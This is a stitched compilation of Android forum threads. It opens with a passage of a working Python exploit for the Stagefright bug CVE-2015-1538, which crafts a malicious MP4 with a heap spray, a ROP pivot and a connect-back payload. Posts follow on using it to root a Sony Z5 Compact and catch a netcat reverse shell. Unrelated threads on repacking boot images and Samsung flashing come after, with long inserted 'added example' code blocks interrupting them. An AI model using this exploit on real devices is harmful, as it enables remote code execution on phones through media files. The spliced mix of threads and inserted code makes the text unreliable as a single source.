rop += struct.pack('<L', 0xf0f00000+x)
x += 4
# Add the native payload...
rop += buf
return rop
#
# Build an mp4 that exploits CVE-2015-1538 #1
#
# We mimic meow.3gp here...
#
def create_mp4(sp_addr, newpc_val, cb_host, cb_port):
chunks = []
# Build the MP4 header...
ftyp = 'mp42'
ftyp += struct.pack('>L', 0)
ftyp += 'mp42'
ftyp += 'isom'
chunks.append(make_chunk('ftyp', ftyp))
# Note, this causes a few allocations...
moov_data = ''
moov_data += make_chunk('mvhd',
struct.pack('>LL', 0, 0x41414141) +
('B' * 0x5c) )
# Add a minimal, verified trak to satisfy mLastTrack being set
moov_data += make_chunk('trak',
make_chunk('stbl',
make_stsc(0x28, 0x28) +
make_stco() +
make_stsz() +
make_stts() ))
# Spray the heap using a large tx3g chunk (can contain binary data!)
"""
0x4007004e <_ZNK7android7RefBase9decStrongEPKv+2>: ldr r4, [r0, #4] ; load mRefs
0x40070050 <_ZNK7android7RefBase9decStrongEPKv+4>: mov r5, r0
0x40070052 <_ZNK7android7RefBase9decStrongEPKv+6>: mov r6, r1
0x40070054 <_ZNK7android7RefBase9decStrongEPKv+8>: mov r0, r4
0x40070056 <_ZNK7android7RefBase9decStrongEPKv+10>: blx 0x40069884 ; atomic_decrement
0x4007005a <_ZNK7android7RefBase9decStrongEPKv+14>: cmp r0, #1 ; must be 1
0x4007005c <_ZNK7android7RefBase9decStrongEPKv+16>: bne.n 0x40070076 <_ZNK7android7RefBase9decStrongEPKv+42>
0x4007005e <_ZNK7android7RefBase9decStrongEPKv+18>: ldr r0, [r4, #8] ; load refs->mBase
0x40070060 <_ZNK7android7RefBase9decStrongEPKv+20>: ldr r1, [r0, #0] ; load mBase._vptr
0x40070062 <_ZNK7android7RefBase9decStrongEPKv+22>: ldr r2, [r1, #12] ; load method address
0x40070064 <_ZNK7android7RefBase9decStrongEPKv+24>: mov r1, r6
0x40070066 <_ZNK7android7RefBase9decStrongEPKv+26>: blx r2 ; call it!
"""
page = ''
off = 0 # the offset to the next object
off += 8
page += struct.pack('<L', sp_addr + 8 + 16 + 8 + 12 - 28) # _vptr.RefBase (for when we smash mDataSource)
page += struct.pack('<L', sp_addr + off) # mRefs
off += 16
page += struct.pack('<L', 1) # mStrong
page += struct.pack('<L', 0xc0dedbad) # mWeak
page += struct.pack('<L', sp_addr + off) # mBase
page += struct.pack('<L', 16) # mFlags (dont set OBJECT_LIFETIME_MASK)
off += 8
page += struct.pack('<L', sp_addr + off) # the mBase _vptr.RefBase
page += struct.pack('<L', 0xf00dbabe) # mBase.mRefs (unused)
off += 16
page += struct.pack('<L', 0xc0de0000 + 0x00) # vtable entry 0
page += struct.pack('<L', 0xc0de0000 + 0x04) # vtable entry 4
page += struct.pack('<L', 0xc0de0000 + 0x08) # vtable entry 8
page += struct.pack('<L', newpc_val) # vtable entry 12
rop = build_rop(off, sp_addr, newpc_val, cb_host, cb_port)
x = len(page)
while len(page) < 4096:
page += struct.pack('<L', 0xf0f00000+x)
x += 4
off = 0x34
page = page[:off] + rop + page[off+len(rop):]
spray = page * (((2*1024*1024) / len(page)) - 20)
moov_data += make_chunk('tx3g', spray)
block = 'A' * 0x1c
bigger = 'B' * 0x40
udta = make_chunk('udta',
make_chunk('meta',
struct.pack('>L', 0) +
make_chunk('ilst',
make_chunk('cpil', make_chunk('data', struct.pack('>LL', 21, 0) + 'A')) +
make_chunk('trkn', make_chunk('data', struct.pack('>LL', 0, 0) + 'AAAABBBB')) +
make_chunk('disk', make_chunk('data', struct.pack('>LL', 0, 0) + 'AAAABB')) +
make_chunk('covr', make_chunk('data', struct.pack('>LL', 0, 0) + block)) * 32 +
make_chunk('\xa9alb', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
make_chunk('\xa9ART', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
make_chunk('aART', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
make_chunk('\xa9day', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
make_chunk('\xa9nam', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
make_chunk('\xa9wrt', make_chunk('data', struct.pack('>LL', 0, 0) + block)) +
make_chunk('gnre', make_chunk('data', struct.pack('>LL', 1, 0) + block)) +
make_chunk('covr', make_chunk('data', struct.pack('>LL', 0, 0) + block)) * 32 +
make_chunk('\xa9ART', make_chunk('data', struct.pack('>LL', 0, 0) + bigger)) +
make_chunk('\xa9wrt', make_chunk('data', struct.pack('>LL', 0, 0) + bigger)) +
make_chunk('\xa9day', make_chunk('data', struct.pack('>LL', 0, 0) + bigger)))
)
)
moov_data += udta
# Make the nasty trak
tkhd1 = ''.join([
'\x00', # version
'D' * 3, # padding
'E' * (5*4), # {c,m}time, id, ??, duration
'F' * 0x10, # ??
struct.pack('>LLLLLL',
0x10000, # a00
0, # a01
0, # dx
0, # a10
0x10000, # a11
0), # dy
'G' * 0x14
])
trak1 = ''
trak1 += make_chunk('tkhd', tkhd1)
mdhd1 = ''.join([
'\x00', # version
'D' * 0x17, # padding
])
mdia1 = ''
mdia1 += make_chunk('mdhd', mdhd1)
mdia1 += make_chunk('hdlr', 'F' * 0x3a)
dinf1 = ''
dinf1 += make_chunk('dref', 'H' * 0x14)
minf1 = ''
minf1 += make_chunk('smhd', 'G' * 0x08)
minf1 += make_chunk('dinf', dinf1)
# Build the nasty sample table to trigger the vulnerability here.
stbl1 = make_stsc(3, (0x1200 / 0xc) - 1, sp_addr, True) # TRIGGER
# Add the stbl to the minf chunk
minf1 += make_chunk('stbl', stbl1)
# Add the minf to the mdia chunk
mdia1 += make_chunk('minf', minf1)
# Add the mdia to the track
trak1 += make_chunk('mdia', mdia1)
# Add the nasty track to the moov data
moov_data += make_chunk('trak', trak1)
# Finalize the moov chunk
moov = make_chunk('moov', moov_data)
chunks.append(moov)
# Combine outer chunks together and voila.
data = ''.join(chunks)
return data
if __name__ == '__main__':
import sys
# import mp4
import argparse
def write_file(path, content):
with open(path, 'wb') as f:
f.write(content)
def addr(sval):
if sval.startswith('0x'):
return int(sval, 16)
return int(sval)
# The address of a fake StrongPointer object (sprayed)
sp_addr = 0x41d00010 # takju @ imm76i - 2MB (via hangouts)
# The address to of our ROP pivot
newpc_val = 0xb0002850 # point sp at __dl_restore_core_regs
# Allow the user to override parameters
parser = argparse.ArgumentParser()
parser.add_argument('-c', '--connectback-host', dest='cbhost', default='31.3.3.7')
parser.add_argument('-p', '--connectback-port', dest='cbport', type=int, default=12345)
parser.add_argument('-s', '--spray-address', dest='spray_addr', type=addr, default=None)
parser.add_argument('-r', '--rop-pivot', dest='rop_pivot', type=addr, default=None)
parser.add_argument('-o', '--output-file', dest='output_file', default='cve-2015-1538-1.mp4')
args = parser.parse_args()
if len(sys.argv) == 1:
parser.print_help()
sys.exit(-1)
if args.spray_addr == None:
args.spray_addr = sp_addr
if args.rop_pivot == None:
args.rop_pivot = newpc_val
# Build the MP4 file...
# data = mp4.create_mp4(args.spray_addr, args.rop_pivot, args.cbhost, args.cbport)
data = create_mp4(args.spray_addr, args.rop_pivot, args.cbhost, args.cbport)
print('[*] Saving crafted MP4 to %s ...' % args.output_file)
write_file(args.output_file, data)
(The modifications are: changing line 77 from "def make_stsc(num_alloc, num_write, sp_addr=0x42424242, do_overflow = False)" to "def make_stsc(num_alloc, num_write, sp_addr=0x42424242, do_overflow = True)" to achieve using the exploit, commenting out "import mp4" in line 353 to avoid compiler errors, and changing line 390 from "data = mp4.create_mp4(args.spray_addr, args.rop_pivot, args.cbhost, args.cbport)" to "data = create_mp4(args.spray_addr, args.rop_pivot, args.cbhost, args.cbport)" to avoid compiler errors.)
To run the code I used the "Wing IDE" in combination with "Python 2.7.3". I used the -c <reconnect-IP-address> and -p <reconnect-port> arguments.
But I can't get reconnected from my Sony Xperia Z5 compact because I don't know how to backlisten to the phone and switch to a shell. Maybe the computer in the Zimperium video shows a Linux machine and I'm just running a Windows 7 machine.
But maybe it helps you on the way to save the DRM keys.
(By the way: In the video the "id" command after the first changing directory shows "uid=0(root)" and "gid=0(root)" which means to me that the user has root privileges. Or I'm wrong?)
"Klaus"
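A defender-side check that follows from the post above: the script's `make_stsc(..., do_overflow=True)` and the CVE number in the output filename point at the MP4 sample-to-chunk (`stsc`) table, and the libstagefright fix for CVE-2015-1538 rejects an `stsc` whose declared entry count either overflows the 32-bit size computation for the 12-byte entries or does not fit in the box. The scanner below is an added example written for this thread (not code from the exploit script, from Zimperium, or from libstagefright); it walks the standard ISO BMFF box tree and applies those two checks to every `stsc` box. The sample files are constructed in memory and are not real captures.

```python
"""Flag MP4 'stsc' boxes whose declared entry_count cannot be trusted.

Added example, not part of the exploit script or of libstagefright. The two
checks are the ones the CVE-2015-1538 fix applies: the entry table size
(entry_count * 12) must not wrap a 32-bit size, and it must fit in the box.
"""
import struct

CONTAINER_BOXES = {b"moov", b"trak", b"mdia", b"minf", b"stbl"}
STSC_ENTRY_SIZE = 12   # first_chunk, samples_per_chunk, sample_description_index
U32_MAX = 0xFFFFFFFF


def iter_boxes(data, start, end):
    """Yield (type, box_start, payload_start, payload_end) for each box in
    data[start:end]; raise ValueError if a box size leaves the range."""
    pos = start
    while pos + 8 <= end:
        size, btype = struct.unpack_from(">I4s", data, pos)
        hdr = 8
        if size == 1 and pos + 16 <= end:          # 64-bit largesize follows
            size = struct.unpack_from(">Q", data, pos + 8)[0]
            hdr = 16
        elif size == 0:                            # box runs to end of range
            size = end - pos
        if size < hdr or pos + size > end:
            raise ValueError("box %r at offset %d: size %d out of bounds"
                             % (btype, pos, size))
        yield btype, pos, pos + hdr, pos + size
        pos += size


def check_stsc(payload, box_offset):
    """Consistency checks for one stsc payload (4 bytes version/flags,
    4 bytes entry_count, then the entries). Returns a list of findings."""
    findings = []
    if len(payload) < 8:
        return ["stsc at %d: truncated header" % box_offset]
    entry_count = struct.unpack_from(">I", payload, 4)[0]
    table_bytes = entry_count * STSC_ENTRY_SIZE
    if table_bytes > U32_MAX:
        findings.append("stsc at %d: entry_count %d overflows a 32-bit size "
                        "computation (CVE-2015-1538 pattern)"
                        % (box_offset, entry_count))
    if table_bytes > len(payload) - 8:
        findings.append("stsc at %d: entry_count %d needs %d bytes but the box "
                        "holds %d" % (box_offset, entry_count, table_bytes,
                                      len(payload) - 8))
    return findings


def scan_mp4(data):
    """Return all findings for a file; an empty list means every stsc is sane."""
    findings = []

    def walk(start, end):
        try:
            for btype, bstart, pstart, pend in iter_boxes(data, start, end):
                if btype in CONTAINER_BOXES:
                    walk(pstart, pend)
                elif btype == b"stsc":
                    findings.extend(check_stsc(data[pstart:pend], bstart))
        except ValueError as exc:
            findings.append(str(exc))

    walk(0, len(data))
    return findings


# --- constructed sample input (not a real capture) ---------------------------

def box(btype, payload):
    return struct.pack(">I4s", 8 + len(payload), btype) + payload


def stsc_box(declared_count, entries):
    """Build an stsc box; declared_count may disagree with len(entries)."""
    body = struct.pack(">II", 0, declared_count)
    for first_chunk, per_chunk, desc_index in entries:
        body += struct.pack(">III", first_chunk, per_chunk, desc_index)
    return box(b"stsc", body)


def sample_file(declared_count):
    """Minimal ftyp + moov/trak/mdia/minf/stbl/stsc skeleton with one entry."""
    stbl = box(b"stbl", stsc_box(declared_count, [(1, 1, 1)]))
    moov = box(b"moov", box(b"trak", box(b"mdia", box(b"minf", stbl))))
    return box(b"ftyp", b"isom" + struct.pack(">I", 0) + b"isom") + moov


GOOD_FILE = sample_file(1)             # count matches the single entry written
BAD_FILE = sample_file(0x40000000)     # 0x40000000 * 12 wraps past 2**32

if __name__ == "__main__":
    for label, blob in (("good", GOOD_FILE), ("bad", BAD_FILE)):
        print(label, scan_mp4(blob) or "ok")
```

To check a real file, pass `open(path, "rb").read()` to `scan_mp4`; any finding means a pre-patch libstagefright would have computed an allocation size from an attacker-controlled count, which is exactly the condition the fix guards against.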
But the Z3+ old firmware is vulnerable. Maybe you can use a Z3+ system folder on the Z5! They are quite the same!
Sent from my E6533 using XDA Free mobile app
Good job on modifying the script. I could run it on my Linux box without any modifications and it produced an MP4. I then moved it over to my Z5C and launched it. After that I tried a reverse shell (netcat -l -p <port>) but got nothing. Then I went out on the interwebs to investigate, and here are a couple of pointers.
1. The code is written to exploit the Hangouts app specifically. So running the MP4 with any other player isn't going to work.
2. The code is written to take default values if -s and -r are not given to the script as arguments. The default values are said to only work on the Nexus device it was written for.
3. The video you saw was edited to make it look really simple, or another script was run that they didn't show us.
More information can be found in the comments around here:
http://null-byte.wonderhowto.com/forum/stagefright-exploit-released-0164432/
Happy exploiting, Merry Christmas.
~Aeny
Hey @klausstoertebeker, I have an unrooted stock Sony Z5 Compact that can be used for exploit testing. I wanted to offer it for this purpose before rooting it. If having someone volunteer their "unrooted, bootloader never unlocked" phone as a test device is helpful, then let me know.
Otherwise I'm going to root my new phone soon.
Keep up the good work!
Using "Stagefright" exploit CVE-2015-1538 for rooting Sony Xperia Z5 compact?
Hello Joeisgood99!
Thanks for your offer, but I'm not a programmer who takes part in rooting the Z5 compact actively, 'cause I'm not experienced with Android programming at all. But I tried to give some thought to how root on this excellent mobile phone could be achieved.
For me, using this exploit has become obsolete, 'cause I accidentally did a system update where all the Stagefright exploits are closed...
Regards
"Klaus"
You can downgrade your phone using the flashtools to a previous Android version. Don't give up!!!!
Sent from my E6533 using XDA Free mobile app
Maybe downgrade,...
... but to flash firmware you have to unlock the bootloader. And when unlocking the bootloader, you'll lose your DRM-keys.
And the intention of most "rooting" forums is to find a way of rooting the mobile phone without unlocking the bootloader, to keep the DRM-keys.
And, by the way, if you're unlocking your bootloader you can install a pre-rooted ROM instead of downloading stock ROMs.
You don't need to unlock bootloader to flash an official firmware.
klausstoertebeker said:
... but to flash firmware you have to unlock the bootloader. And when unlocking the bootloader, you'll lose your DRM-keys.
And the intention of most "rooting" forums is to find a way of rooting the mobile phone without unlocking the bootloader, to keep the DRM-keys.
And, by the way, if you're unlocking your bootloader you can install a pre-rooted ROM instead of downloading stock ROMs.
You can flash FTFs without any need of unlocking a bootloader. And while you're at it: use 32.0.A.4.11. Literally everything except CVE-2015-3876 is vulnerable. I just bought a Z5, and I'm looking forward to putting some effort into messing with Stagefright rooting.
I'm having a Z5 E6653 BTW.
Sorry,...
... Myself5!
You're right saying that FTFs can be flashed without unlocking the bootloader. But nevertheless I won't downgrade again at the moment.
The reason for me to root my Z5 compact is that I'd like to install Xposed in combination with XPrivacy for security reasons. I want to control the access of apps to my personal data (contacts, calendar, location, etc). But now I found two apps which fulfil my security needs without root privileges:
MoboClean, which is released as a working app
SRT AppGuard, which is in beta stage
I prefer the second solution, but at the moment it is still under development. I used it with KitKat and JellyBean and it was really good. And until it is released as a "productive" app I'll use MoboClean.
And the second reason for rooting my Z5 compact was that I want to uninstall those Google apps (and other pre-installed bloatware) which collect my data and "phone home" without my notice. And this can be done without rooting now on the Z5 compact via "Preferences -> Apps", selecting "Deactivate" in the appropriate app tab.
There are a number of Stagefright vulnerabilities in some of the stock firmware releases downloadable on Xperifirm. I have made screenshots and posted them on this thread.
http://forum.xda-developers.com/showpost.php?p=64618471&postcount=93
Pardon me, but I was just thinking..
https://www.nccgroup.trust/globalas...pers/2016/01/libstagefright-exploit-notespdf/
Here are some steps/tips on how to deal with SELinux policy in order to use Stagefright exploits successfully. Expert-oriented information.
@zxz0O0 sorry to disturb you, I don't know if you already know those things but I thought it's worth a check.

Building boot.img for Redmi Note 2

It seems that the boot.img images for Redmi Note 2 are being built/assembled using a custom (i.e., non-standard) version of mkbootimg, using non-standard offsets for the kernel and the ramdisk. I have tested this theory with boot.img from different ROMs, and all seem to suffer from the same fate. I have tried several tools and versions of mkbootimg (including abootimg, mktimg, and umkbootimg). Most can decompress the boot images, but none can assemble a boot image that will not brick the phone.
Does anyone have a copy of the mkbootimg (binary or source) that is being used to build these boot images?
Thanks.
PS: my goal is to build in support for running stuff from /etc/init.d/ during bootup (involves editing init.rc).
No worries, I've sorted it out. Can you please close this thread? Thanks.
Use Carliv Image Kitchen (search in the forum or google it), but use decompile or repack for normal Android, not MTK, in the CMD menu, as the MT6795 uses a different compression method.
type thanks please!
DarthJabba9 said:
No worries, I've sorted it out. Can you please close this thread? Thanks.
It would be nice and useful for other people if you explain how you've sorted it out.
gnazio said:
It would be nice and useful for other people if you explain how you've sorted it out.
I'm not sure anyone wants to hear about my trials and tribulations - but it involved downloading and testing all sorts of versions of mkbootimg (binaries, and sources) and other tools, patching mkbootimg sources, downloading Xiaomi Android sources from SudaMod and nofearnohappy github repositories, and studying all the arguments given to mkbootimg in the make files, bricking the phone about 30 times, etc. Eventually, I ended up with a combination of tools (from different sources) and mkbootimg arguments that did the job. I now have init.d support built into my boot image.
I have kept all the relevant tools in a folder for future reference. I'm not sure I'm allowed to distribute them here, or even that I would encourage anyone to try them, because the risk of bricking the phone is very high if something goes wrong (and it is very easy for something to go wrong with what you change in the decompressed ramdisk). For the curious, these were the right arguments (at least, for the boot image that I used - from Deer Stable 7.0.12.0) :
Code:
mkbootimg --kernel boot.img-kernel.img --ramdisk ramdisk.gz \
--base 0x40078000 \
--pagesize 2048 \
--kernel_offset 0x00008000 \
--ramdisk_offset 0x03f88000 \
--second_offset 0x00e88000 \
--tags_offset 0x0df88000 \
--board V7.0.12.0.LHMMI \
--cmdline bootopt=64S3,32N2,64N2 \
--output new_boot.img
I used Superr's kitchen v1.0.0.4 and it worked.

Packing boot image for Desire 610 A3UL

I am following this tutorial on my Desire 610: http://whiteboard.ping.se/Android/Debian
All has gone well so far, the system works in chroot, etc etc etc, that's not the problem. My problem is that I can't seem to pack a boot image that works for the phone. I know the problem is with my boot image, because if the init script had been initialised, I had a line at the start which would start a log file, and the system would bootloop. Instead it takes me to the fastboot menu when I power on.
I have used the tool to unpack the boot image, found at http://whiteboard.ping.se/Android/Unmkbootimg , and its output was this:
Code:
unmkbootimg version 1.2 - Mikael Q Kuisma <[email protected]>
Kernel size 6004624
Kernel address 0x8000
Ramdisk size 1017204
Ramdisk address 0x2008000
Secondary size 0
Secondary address 0xf00000
Kernel tags address 0x1e00000
Flash page size 2048
Board name is ""
Command line "console=ttyHSL0,115200,n8 androidboot.hardware=qcom user_debug=31 ehci-hcd.park=3"
*** WARNING ****
This image is built using NON-standard mkbootimg!
OFF_KERNEL_ADDR is 0xFE208100
OFF_RAMDISK_ADDR is 0x00208100
OFF_SECOND_ADDR is 0xFF100100
Please modify mkbootimg.c using the above values to build your image.
****************
Extracting kernel to file zImage ...
Extracting root filesystem to file initramfs.cpio.gz ...
All done.
---------------
To recompile this image, use:
mkbootimg --kernel zImage --ramdisk initramfs.cpio.gz --base 0x1dfff00 --cmdline 'console=ttyHSL0,115200,n8 androidboot.hardware=qcom user_debug=31 ehci-hcd.park=3' -o new_boot.img
---------------
I have tried doing as it says and compiling mkbootimg with those settings, however it still does not work. Could anyone possibly see what I'm doing wrong? And if not, does anyone have a copy of mkbootimg that works for the Desire 610?
Thanks in advance
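The OFF_*_ADDR values in the unmkbootimg warning above and the explicit --kernel_offset/--ramdisk_offset/--second_offset/--tags_offset flags in the Redmi Note 2 command earlier on this page are two views of the same arithmetic: mkbootimg stores base + offset for each load address, and unmkbootimg tries to recover a single base by assuming the default tags offset (0x100), which is where --base 0x1dfff00 and the wrapped values such as 0xFE208100 come from. The added example below (not code from mkbootimg, unmkbootimg, abootimg or either thread) parses the v0 boot.img header, reproduces that single-base guess, and instead emits an explicit mkbootimg command line with every offset passed as a flag, so no tool source needs patching. The sample image is constructed in memory from the header values quoted above, with placeholder bytes standing in for the real kernel and ramdisk.

```python
"""Read an Android boot.img (header v0) and derive mkbootimg offsets.

Added example for this thread, not code from any boot-image tool. Header
layout is the v0 struct from AOSP bootimg.h; the arithmetic is mkbootimg's:
    kernel_addr  = base + kernel_offset   (default offset 0x00008000)
    ramdisk_addr = base + ramdisk_offset  (default offset 0x01000000)
    second_addr  = base + second_offset   (default offset 0x00f00000)
    tags_addr    = base + tags_offset     (default offset 0x00000100)
everything in 32-bit arithmetic.
"""
import shlex
import struct

BOOT_MAGIC = b"ANDROID!"
# magic, kernel_size, kernel_addr, ramdisk_size, ramdisk_addr, second_size,
# second_addr, tags_addr, page_size, header_version, os_version,
# name[16], cmdline[512], id[32], extra_cmdline[1024]
HEADER_FMT = "<8s10I16s512s32s1024s"
HEADER_SIZE = struct.calcsize(HEADER_FMT)       # 1632 bytes
MASK32 = 0xFFFFFFFF
DEFAULT_OFFSETS = {"kernel": 0x00008000, "ramdisk": 0x01000000,
                   "second": 0x00F00000, "tags": 0x00000100}


def _pad(data, page_size):
    rem = len(data) % page_size
    return data if rem == 0 else data + b"\0" * (page_size - rem)


def build_boot_image(kernel, ramdisk, *, kernel_addr, ramdisk_addr,
                     second_addr, tags_addr, page_size=2048, cmdline=b"", name=b""):
    """Assemble a v0 image as mkbootimg lays it out: one header page, then the
    kernel, then the ramdisk, each padded to page_size (no second stage)."""
    hdr = struct.pack(HEADER_FMT, BOOT_MAGIC,
                      len(kernel), kernel_addr, len(ramdisk), ramdisk_addr,
                      0, second_addr, tags_addr, page_size, 0, 0,
                      name, cmdline, b"\0" * 32, b"")
    return _pad(hdr, page_size) + _pad(kernel, page_size) + _pad(ramdisk, page_size)


def parse_boot_header(image):
    if len(image) < HEADER_SIZE or image[:8] != BOOT_MAGIC:
        raise ValueError("not an Android boot image (no ANDROID! magic)")
    f = struct.unpack(HEADER_FMT, image[:HEADER_SIZE])
    hdr = {"kernel_size": f[1], "kernel_addr": f[2],
           "ramdisk_size": f[3], "ramdisk_addr": f[4],
           "second_size": f[5], "second_addr": f[6],
           "tags_addr": f[7], "page_size": f[8],
           "name": f[11].rstrip(b"\0").decode(errors="replace"),
           "cmdline": f[12].rstrip(b"\0").decode(errors="replace")}
    if hdr["page_size"] == 0 or hdr["page_size"] & (hdr["page_size"] - 1):
        raise ValueError("page size %d is not a power of two" % hdr["page_size"])
    return hdr


def split_boot_image(image):
    """Return (header, kernel_bytes, ramdisk_bytes)."""
    hdr = parse_boot_header(image)
    ps = hdr["page_size"]
    k_off = ps                                           # header occupies page 0
    r_off = k_off + ps * ((hdr["kernel_size"] + ps - 1) // ps)
    return (hdr, image[k_off:k_off + hdr["kernel_size"]],
            image[r_off:r_off + hdr["ramdisk_size"]])


def offsets_for_base(hdr, base):
    """Offsets mkbootimg needs for a given base, in 32-bit arithmetic."""
    return {k: (hdr[k + "_addr"] - base) & MASK32 for k in DEFAULT_OFFSETS}


def unmkbootimg_guess(hdr):
    """Mimic the single-base guess: assume the default tags offset, derive the
    base from tags_addr, and report the (possibly wrapped) other offsets."""
    base = (hdr["tags_addr"] - DEFAULT_OFFSETS["tags"]) & MASK32
    return base, offsets_for_base(hdr, base)


def mkbootimg_command(hdr, kernel="zImage", ramdisk="initramfs.cpio.gz",
                      out="new_boot.img"):
    """Explicit mkbootimg command: base chosen so the kernel keeps the usual
    0x8000 offset; every other offset is passed as its own flag."""
    base = (hdr["kernel_addr"] - DEFAULT_OFFSETS["kernel"]) & MASK32
    off = offsets_for_base(hdr, base)
    args = ["mkbootimg", "--kernel", kernel, "--ramdisk", ramdisk,
            "--base", "0x%08x" % base, "--pagesize", str(hdr["page_size"])]
    for k in ("kernel", "ramdisk", "second", "tags"):
        args += ["--%s_offset" % k, "0x%08x" % off[k]]
    if hdr["name"]:
        args += ["--board", hdr["name"]]
    if hdr["cmdline"]:
        args += ["--cmdline", hdr["cmdline"]]
    return " ".join(shlex.quote(a) for a in args + ["-o", out])


# Constructed sample: header values copied from the unmkbootimg output above,
# with placeholder payloads standing in for the real kernel and ramdisk.
SAMPLE_IMAGE = build_boot_image(
    b"kernel" * 1000, b"\x1f\x8b" + b"\0" * 3000,
    kernel_addr=0x8000, ramdisk_addr=0x2008000, second_addr=0xF00000,
    tags_addr=0x1E00000, page_size=2048,
    cmdline=b"console=ttyHSL0,115200,n8 androidboot.hardware=qcom "
            b"user_debug=31 ehci-hcd.park=3")

if __name__ == "__main__":
    hdr, _, _ = split_boot_image(SAMPLE_IMAGE)
    base, off = unmkbootimg_guess(hdr)
    print("single-base guess: base=0x%08x kernel=0x%08x ramdisk=0x%08x second=0x%08x"
          % (base, off["kernel"], off["ramdisk"], off["second"]))
    print(mkbootimg_command(hdr))
```

For a real image, `split_boot_image(open("boot.img", "rb").read())` gives the header plus the raw kernel and ramdisk; compare `mkbootimg_command(hdr)` against the output of `parse_boot_header` on the repacked file to confirm every load address survived the round trip before flashing. The header parser covers only v0 images; an image that carries a separate device-tree blob or a newer header version needs the corresponding extra fields.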
falseascension said:
I am following this tutorial on my Desire 610: http://whiteboard.ping.se/Android/Debian
All has gone well so far, the system works in chroot, etc etc etc, that's not the problem. My problem is that I can't seem to pack a boot image that works for the phone. I know the problem is with my boot image, because if the init script had been initialised, I had a line at the start which would start a log file, and the system would bootloop. Instead it takes me to the fastboot menu when I power on.
I have used the tool to unpack the boot image, found at http://whiteboard.ping.se/Android/Unmkbootimg , and its output was this:
Code:
unmkbootimg version 1.2 - Mikael Q Kuisma <[email protected]>
Kernel size 6004624
Kernel address 0x8000
Ramdisk size 1017204
Ramdisk address 0x2008000
Secondary size 0
Secondary address 0xf00000
Kernel tags address 0x1e00000
Flash page size 2048
Board name is ""
Command line "console=ttyHSL0,115200,n8 androidboot.hardware=qcom user_debug=31 ehci-hcd.park=3"
*** WARNING ****
This image is built using NON-standard mkbootimg!
OFF_KERNEL_ADDR is 0xFE208100
OFF_RAMDISK_ADDR is 0x00208100
OFF_SECOND_ADDR is 0xFF100100
Please modify mkbootimg.c using the above values to build your image.
****************
Extracting kernel to file zImage ...
Extracting root filesystem to file initramfs.cpio.gz ...
All done.
---------------
To recompile this image, use:
mkbootimg --kernel zImage --ramdisk initramfs.cpio.gz --base 0x1dfff00 --cmdline 'console=ttyHSL0,115200,n8 androidboot.hardware=qcom user_debug=31 ehci-hcd.park=3' -o new_boot.img
---------------
I have tried doing as it says and compiling mkbootimg with those settings, however it still does not work. Could anyone possibly see what I'm doing wrong? And if not, does anyone have a copy of mkbootimg that works for the Desire 610?
Thanks in advance
I just use Blobtools and linux's standard abootimg. I'll find some links and do a quick Howto when I get home tonight.
MiniBlu
MiniBlu said:
I just use Blobtools and linux's standard abootimg. I'll find some links and do a quick Howto when I get home tonight.
MiniBlu
Cheers! Looking forward to getting this thing actually working.
Aha! Using abootimg made it work. Wish I knew about that earlier...
There are still a few errors though, need to fix that. Thanks for your help, you literally saved probably hours and hours more work if I hadn't known about this. Much appreciated.

Stuck in Download Mode after failed download with Odin

Hi,
I own a Galaxy A31 which I tried to root using Odin. After installing the AP file, AP_A315GDXU1ATCE_CL18205420_QB29839975_REV00_user_low_ship_MULTI_CERT_meta_OS10.tar.md5, the app said that the download failed. Now I'm stuck on this screen that says "Downloading... Do not turn off target." At the top of the screen, it also says this:
<!>
Partitions tee1
Reason SAMSUNG tee1, A315GDXU1ATH3 , 33893817R
SAMSUNG vbmeta, A315GDXU1ATH3, 33893817R
Whenever I try to restart the phone, it just returns to that same page.
Did you ever find a fix for this?
I'm in the same boat, flashed (downgraded) an A41 from Android 12 to Android 10, getting the same "Partitions tee1" error no matter how often I re-flash all partitions...
Fixed it myself!
Download & compile heimdall2 from https://git.sr.ht/~grimler/Heimdall (I'm on Linux).
Get official firmware. Unzip, untar, unlz4 (gosh, that's a lot of unnecessary compression).
Flash like this (for an A41, that is, double check your partitions are named like this!):
Bash:
~/heimdall2/bin/heimdall flash \
--super super.img \
--bootloader preloader.img \
--uh uh.bin \
--lk lk-verified.img \
--up_param up_param.bin \
--efuse efuse.img \
--boot boot.img \
--recovery recovery.img \
--vbmeta_samsung vbmeta_samsung.img \
--md1img md1img.img \
--cache cache.img \
--prism prism.img \
--optics optics.img \
--vbmeta vbmeta.img \
--gz1 gz-verified.img \
--dtbo dtbo.img \
--spmfw spmfw-verified.img \
--scp1 scp-verified.img \
--sspm_1 sspm-verified.img \
--tee1 tee-verified.img \
--userdata userdata.img \
--md_udc md_udc.img \
--omr omr.img \
--param param.bin \
--verbose
Regardless of which USB (2/3) port or cable I use, I have to start heimdall within a second after pushing the volume down button to actually start download mode. I don't know if this is by design. Otherwise I only get
Code:
ERROR: Protocol initialisation failed!
or other (timeout) errors (-7).
Additionally, I can only issue one single command. Even using
Code:
--resume
does not work after the first command.
Heimdall 1.4.2 ran into timeouts in larger uploads (super.img) or the phone saying only official binaries are allowed.
Hope this helps someone. Took me hours to find out.